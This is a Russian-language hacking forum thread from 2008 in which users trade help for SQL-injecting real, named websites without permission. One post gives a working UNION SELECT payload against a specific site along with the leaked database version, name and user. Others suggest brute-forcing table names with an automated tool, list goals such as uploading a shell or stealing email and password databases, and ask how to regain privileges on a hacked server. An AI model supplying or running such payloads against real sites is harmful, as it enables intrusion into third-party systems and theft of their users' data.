ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1901  
Старый 07.05.2008, 18:57
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Zergius, прочитать пару статей по SQL-инъекциям. Их тут очень много, можно даже поиск не юзать, просто зайти в раздел "Статьи". Там всё подробно расписано.

з.ы. https://forum.antichat.ru/thread19605.html вот

з.з.ы. Если тебе интересно зачем это вообще надо - ну много вариантов: шелл залить, инфу вытащить (базу мыл, пассы и т.п.), заддосить..

Последний раз редактировалось n0ne; 07.05.2008 в 20:19..
 
Ответить с цитированием

  #1902  
Старый 07.05.2008, 21:06
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
 
Ответить с цитированием

  #1903  
Старый 07.05.2008, 21:14
Zergius
Новичок
Регистрация: 04.12.2007
Сообщений: 6
Провел на форуме:
37345

Репутация: 1
По умолчанию

Просто я ни в одной статье такого не вижу, а насчет инфы-это извесный сайт по фотошопу, как пойму как вытащить инфу(учиться как то надо), так админу думаю расскажу...
Млин, все равно не догоняю =(((
 
Ответить с цитированием

  #1904  
Старый 07.05.2008, 21:16
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,c oncat_ws(0x2F,version(),database(),user()),7,8,9,1 0,11,12,13,14/*
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost

Доступа к information_schema нет. К форуму (phpbb) - тоже. Можешь попробовать подбирать названия таблиц вручную. Типа там users, members и тд.
 
Ответить с цитированием

  #1905  
Старый 07.05.2008, 21:18
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от diznt  
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
f5
 
Ответить с цитированием

  #1906  
Старый 07.05.2008, 21:19
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
 
Ответить с цитированием

  #1907  
Старый 07.05.2008, 21:24
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от diznt  
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
Есть проги типа SQL Injection Tool от SQLHACK. Там если я не ошибаюсь можно организовать автоподбор. А вообще где-то тут была тема часто юзаемых имен для таблиц и колумнов. Поищи и проверь если хочешь.

Zergius, дай ссылку на сайт. На пальцах никто ничего не объяснит.
 
Ответить с цитированием

  #1908  
Старый 07.05.2008, 22:01
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

ООООООО МДЯЯЯЯ ВОТЬ ЭТО УЖЕ РЕАЛЬНЫЙ ППЦ)))))))) (p.s. наврятли чтото получиться имхо хотя не кто не знает что произойдет)
Сор за капс
 
Ответить с цитированием

  #1909  
Старый 07.05.2008, 23:32
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Вот такое дело, был сайт на нем висел шелл долго, были права на редактирование индекса, потом админ убрал права на запись, какие есть возможные способы поднять права?
 
Ответить с цитированием

  #1910  
Старый 07.05.2008, 23:42
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Zergius не волнуйся у мя такая же трабла со школьным сайтом((
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ